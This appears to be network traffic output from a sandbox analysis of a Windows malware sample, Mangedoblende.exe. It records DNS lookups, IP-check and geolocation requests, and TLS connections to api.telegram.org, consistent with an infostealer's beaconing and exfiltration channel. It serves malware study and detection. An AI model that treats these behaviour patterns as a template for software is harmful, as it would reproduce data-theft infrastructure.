                                                                                                                                                                          Jan 10, 2025 19:17:35.150015116 CET49969443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:35.151335001 CET49969443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:35.155278921 CET4997280192.168.2.5193.122.6.168
Timestamp                            Src Port  Dst Port  Source IP         Dest IP
Jan 10, 2025 19:17:35.160077095 CET  80        49972     193.122.6.168     192.168.2.5
Jan 10, 2025 19:17:35.160165071 CET  49972     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:35.160285950 CET  49972     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:35.165072918 CET  80        49972     193.122.6.168     192.168.2.5
Jan 10, 2025 19:17:35.959270000 CET  80        49972     193.122.6.168     192.168.2.5
Jan 10, 2025 19:17:35.960747957 CET  49977     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:35.960772038 CET  443       49977     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:35.960844994 CET  49977     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:35.961114883 CET  49977     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:35.961132050 CET  443       49977     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:36.011802912 CET  49972     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:36.428488970 CET  443       49977     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:36.430500031 CET  49977     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:36.430527925 CET  443       49977     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:36.554831028 CET  443       49977     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:36.554982901 CET  443       49977     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:36.555214882 CET  49977     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:36.555476904 CET  49977     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:36.559030056 CET  49972     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:36.560164928 CET  49983     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:36.563954115 CET  80        49972     193.122.6.168     192.168.2.5
Jan 10, 2025 19:17:36.564033031 CET  49972     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:36.564953089 CET  80        49983     193.122.6.168     192.168.2.5
Jan 10, 2025 19:17:36.565027952 CET  49983     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:36.565121889 CET  49983     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:36.569880009 CET  80        49983     193.122.6.168     192.168.2.5
Jan 10, 2025 19:17:37.435651064 CET  80        49983     193.122.6.168     192.168.2.5
Jan 10, 2025 19:17:37.436908960 CET  49988     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:37.436939001 CET  443       49988     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:37.436995983 CET  49988     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:37.437230110 CET  49988     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:37.437251091 CET  443       49988     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:37.484780073 CET  49983     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:37.928009033 CET  443       49988     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:37.930313110 CET  49988     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:37.930339098 CET  443       49988     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:38.055710077 CET  443       49988     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:38.055785894 CET  443       49988     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:38.055861950 CET  49988     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:38.056245089 CET  49988     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:38.060034990 CET  49983     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:38.060832024 CET  49989     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:38.065391064 CET  80        49983     193.122.6.168     192.168.2.5
Jan 10, 2025 19:17:38.065706968 CET  80        49989     193.122.6.168     192.168.2.5
Jan 10, 2025 19:17:38.065771103 CET  49983     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:38.065805912 CET  49989     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:38.067591906 CET  49989     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:38.072458029 CET  80        49989     193.122.6.168     192.168.2.5
Jan 10, 2025 19:17:39.408058882 CET  80        49989     193.122.6.168     192.168.2.5
Jan 10, 2025 19:17:39.409640074 CET  49990     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:39.409676075 CET  443       49990     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:39.409754038 CET  49990     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:39.410037994 CET  49990     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:39.410051107 CET  443       49990     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:39.449301958 CET  49989     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:39.882740021 CET  443       49990     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:39.884835005 CET  49990     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:39.884869099 CET  443       49990     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:40.019303083 CET  443       49990     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:40.019393921 CET  443       49990     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:40.019464016 CET  49990     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:40.020179033 CET  49990     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:40.024324894 CET  49989     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:40.025747061 CET  49991     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:40.029349089 CET  80        49989     193.122.6.168     192.168.2.5
Jan 10, 2025 19:17:40.029531956 CET  49989     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:40.030539036 CET  80        49991     193.122.6.168     192.168.2.5
Jan 10, 2025 19:17:40.031338930 CET  49991     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:40.031338930 CET  49991     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:40.036139011 CET  80        49991     193.122.6.168     192.168.2.5
Jan 10, 2025 19:17:41.878340006 CET  80        49991     193.122.6.168     192.168.2.5
Jan 10, 2025 19:17:41.882280111 CET  49992     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:41.882322073 CET  443       49992     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:41.882391930 CET  49992     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:41.882683992 CET  49992     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:41.882705927 CET  443       49992     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:41.933748007 CET  49991     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:42.365549088 CET  443       49992     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:42.367631912 CET  49992     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:42.367660046 CET  443       49992     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:42.507798910 CET  443       49992     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:42.507879019 CET  443       49992     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:42.508097887 CET  49992     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:42.508431911 CET  49992     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:42.511699915 CET  49991     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:42.512504101 CET  49993     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:42.516590118 CET  80        49991     193.122.6.168     192.168.2.5
Jan 10, 2025 19:17:42.516827106 CET  49991     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:42.517323971 CET  80        49993     193.122.6.168     192.168.2.5
Jan 10, 2025 19:17:42.517405987 CET  49993     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:42.517492056 CET  49993     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:42.522284031 CET  80        49993     193.122.6.168     192.168.2.5
Jan 10, 2025 19:17:44.143934965 CET  80        49993     193.122.6.168     192.168.2.5
Jan 10, 2025 19:17:44.145220995 CET  49994     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:44.145308971 CET  443       49994     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:44.145380020 CET  49994     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:44.145631075 CET  49994     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:44.145642996 CET  443       49994     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:44.183676958 CET  49993     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:44.635817051 CET  443       49994     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:44.637626886 CET  49994     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:44.637640953 CET  443       49994     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:44.790776968 CET  443       49994     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:44.790960073 CET  443       49994     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:44.791094065 CET  49994     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:44.791539907 CET  49994     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:44.795742035 CET  49993     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:44.797323942 CET  49995     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:44.800820112 CET  80        49993     193.122.6.168     192.168.2.5
Jan 10, 2025 19:17:44.800966024 CET  49993     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:44.802155972 CET  80        49995     193.122.6.168     192.168.2.5
Jan 10, 2025 19:17:44.802258968 CET  49995     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:44.802400112 CET  49995     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:44.807179928 CET  80        49995     193.122.6.168     192.168.2.5
Jan 10, 2025 19:17:45.442804098 CET  80        49995     193.122.6.168     192.168.2.5
Jan 10, 2025 19:17:45.444257021 CET  49996     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:45.444303036 CET  443       49996     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:45.444427013 CET  49996     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:45.444660902 CET  49996     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:45.444667101 CET  443       49996     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:45.496177912 CET  49995     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:45.925822973 CET  443       49996     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:45.927685022 CET  49996     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:45.927705050 CET  443       49996     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:46.061125994 CET  443       49996     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:46.061305046 CET  443       49996     104.21.96.1       192.168.2.5
Jan 10, 2025 19:17:46.061408043 CET  49996     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:46.062093019 CET  49996     443       192.168.2.5       104.21.96.1
Jan 10, 2025 19:17:46.092827082 CET  49995     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:46.098067999 CET  80        49995     193.122.6.168     192.168.2.5
Jan 10, 2025 19:17:46.098129034 CET  49995     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:46.101130962 CET  49997     443       192.168.2.5       149.154.167.220
Jan 10, 2025 19:17:46.101167917 CET  443       49997     149.154.167.220   192.168.2.5
Jan 10, 2025 19:17:46.101233959 CET  49997     443       192.168.2.5       149.154.167.220
Jan 10, 2025 19:17:46.101835012 CET  49997     443       192.168.2.5       149.154.167.220
Jan 10, 2025 19:17:46.101844072 CET  443       49997     149.154.167.220   192.168.2.5
Jan 10, 2025 19:17:46.924567938 CET  443       49997     149.154.167.220   192.168.2.5
Jan 10, 2025 19:17:46.924693108 CET  49997     443       192.168.2.5       149.154.167.220
Jan 10, 2025 19:17:46.926690102 CET  49997     443       192.168.2.5       149.154.167.220
Jan 10, 2025 19:17:46.926700115 CET  443       49997     149.154.167.220   192.168.2.5
Jan 10, 2025 19:17:46.927253008 CET  443       49997     149.154.167.220   192.168.2.5
Jan 10, 2025 19:17:46.928936005 CET  49997     443       192.168.2.5       149.154.167.220
Jan 10, 2025 19:17:46.971329927 CET  443       49997     149.154.167.220   192.168.2.5
Jan 10, 2025 19:17:47.167824984 CET  443       49997     149.154.167.220   192.168.2.5
Jan 10, 2025 19:17:47.167906046 CET  443       49997     149.154.167.220   192.168.2.5
Jan 10, 2025 19:17:47.167985916 CET  49997     443       192.168.2.5       149.154.167.220
Jan 10, 2025 19:17:47.170164108 CET  49997     443       192.168.2.5       149.154.167.220
Jan 10, 2025 19:17:53.037472963 CET  49960     80        192.168.2.5       193.122.6.168
Jan 10, 2025 19:17:53.256320000 CET  49998     443       192.168.2.5       149.154.167.220
Jan 10, 2025 19:17:53.256361008 CET  443       49998     149.154.167.220   192.168.2.5
Jan 10, 2025 19:17:53.256486893 CET  49998     443       192.168.2.5       149.154.167.220
Jan 10, 2025 19:17:53.256830931 CET  49998     443       192.168.2.5       149.154.167.220
Jan 10, 2025 19:17:53.256845951 CET  443       49998     149.154.167.220   192.168.2.5
Jan 10, 2025 19:17:53.895303011 CET  443       49998     149.154.167.220   192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:53.897187948 CET49998443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:53.897207975 CET44349998149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:53.897319078 CET49998443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:53.897325039 CET44349998149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:54.329468966 CET44349998149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:54.329688072 CET44349998149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:54.329761982 CET49998443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:54.330233097 CET49998443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:55.853915930 CET50000443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:55.853950977 CET44350000149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:55.854027987 CET50000443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:55.854368925 CET50000443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:55.854384899 CET44350000149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:56.497364044 CET44350000149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:56.506762028 CET50000443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:56.506783009 CET44350000149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:56.506855965 CET50000443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:56.506867886 CET44350000149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:56.857933998 CET44350000149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:56.858155966 CET44350000149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:56.858231068 CET50000443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:56.858516932 CET50000443192.168.2.5149.154.167.220
                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          Jan 10, 2025 19:17:24.801769018 CET5307253192.168.2.51.1.1.1
                                                                                                                                                                          Jan 10, 2025 19:17:24.808415890 CET53530721.1.1.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:25.981754065 CET5303253192.168.2.51.1.1.1
                                                                                                                                                                          Jan 10, 2025 19:17:25.988642931 CET53530321.1.1.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.961142063 CET5200253192.168.2.51.1.1.1
                                                                                                                                                                          Jan 10, 2025 19:17:29.968135118 CET53520021.1.1.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:31.445225000 CET5535553192.168.2.51.1.1.1
                                                                                                                                                                          Jan 10, 2025 19:17:31.452317953 CET53553551.1.1.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:33.190357924 CET4943453192.168.2.51.1.1.1
                                                                                                                                                                          Jan 10, 2025 19:17:33.197295904 CET53494341.1.1.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:46.093625069 CET5147153192.168.2.51.1.1.1
                                                                                                                                                                          Jan 10, 2025 19:17:46.100445032 CET53514711.1.1.1192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 19:17:24.801769018 CET | 192.168.2.5 | 1.1.1.1 | 0x6d4c | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:17:25.981754065 CET | 192.168.2.5 | 1.1.1.1 | 0x57cc | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:17:29.961142063 CET | 192.168.2.5 | 1.1.1.1 | 0xc17e | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:17:31.445225000 CET | 192.168.2.5 | 1.1.1.1 | 0xefbe | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:17:33.190357924 CET | 192.168.2.5 | 1.1.1.1 | 0x8281 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:17:46.093625069 CET | 192.168.2.5 | 1.1.1.1 | 0x99a3 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 19:17:24.808415890 CET | 1.1.1.1 | 192.168.2.5 | 0x6d4c | No error (0) | drive.google.com | - | 142.250.185.174 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:17:25.988642931 CET | 1.1.1.1 | 192.168.2.5 | 0x57cc | No error (0) | drive.usercontent.google.com | - | 216.58.212.161 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:17:29.968135118 CET | 1.1.1.1 | 192.168.2.5 | 0xc17e | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 19:17:29.968135118 CET | 1.1.1.1 | 192.168.2.5 | 0xc17e | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:17:29.968135118 CET | 1.1.1.1 | 192.168.2.5 | 0xc17e | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:17:29.968135118 CET | 1.1.1.1 | 192.168.2.5 | 0xc17e | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:17:29.968135118 CET | 1.1.1.1 | 192.168.2.5 | 0xc17e | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:17:29.968135118 CET | 1.1.1.1 | 192.168.2.5 | 0xc17e | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:17:31.452317953 CET | 1.1.1.1 | 192.168.2.5 | 0xefbe | No error (0) | reallyfreegeoip.org | - | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:17:31.452317953 CET | 1.1.1.1 | 192.168.2.5 | 0xefbe | No error (0) | reallyfreegeoip.org | - | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:17:31.452317953 CET | 1.1.1.1 | 192.168.2.5 | 0xefbe | No error (0) | reallyfreegeoip.org | - | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:17:31.452317953 CET | 1.1.1.1 | 192.168.2.5 | 0xefbe | No error (0) | reallyfreegeoip.org | - | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:17:31.452317953 CET | 1.1.1.1 | 192.168.2.5 | 0xefbe | No error (0) | reallyfreegeoip.org | - | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:17:31.452317953 CET | 1.1.1.1 | 192.168.2.5 | 0xefbe | No error (0) | reallyfreegeoip.org | - | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:17:31.452317953 CET | 1.1.1.1 | 192.168.2.5 | 0xefbe | No error (0) | reallyfreegeoip.org | - | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:17:33.197295904 CET | 1.1.1.1 | 192.168.2.5 | 0x8281 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 19:17:33.197295904 CET | 1.1.1.1 | 192.168.2.5 | 0x8281 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:17:33.197295904 CET | 1.1.1.1 | 192.168.2.5 | 0x8281 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:17:33.197295904 CET | 1.1.1.1 | 192.168.2.5 | 0x8281 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:17:33.197295904 CET | 1.1.1.1 | 192.168.2.5 | 0x8281 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:17:33.197295904 CET | 1.1.1.1 | 192.168.2.5 | 0x8281 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:17:46.100445032 CET | 1.1.1.1 | 192.168.2.5 | 0x99a3 | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• drive.google.com
• drive.usercontent.google.com
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49937 | 132.226.247.73 | 80 | 1292 | C:\Users\user\AppData\Local\Temp\Mangedoblende.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:17:29.978159904 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 19:17:30.647782087 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:17:30 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 19:17:30.651956081 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 19:17:30.859430075 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:17:30 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 19:17:32.097290993 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 19:17:32.308609962 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:17:32 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49960 | 193.122.6.168 | 80 | 1292 | C:\Users\user\AppData\Local\Temp\Mangedoblende.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:17:33.203332901 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 19:17:34.549654007 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:17:34 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49972 | 193.122.6.168 | 80 | 1292 | C:\Users\user\AppData\Local\Temp\Mangedoblende.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:17:35.160285950 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 19:17:35.959270000 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:17:35 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49983 | 193.122.6.168 | 80 | 1292 | C:\Users\user\AppData\Local\Temp\Mangedoblende.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:17:36.565121889 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 19:17:37.435651064 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:17:37 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
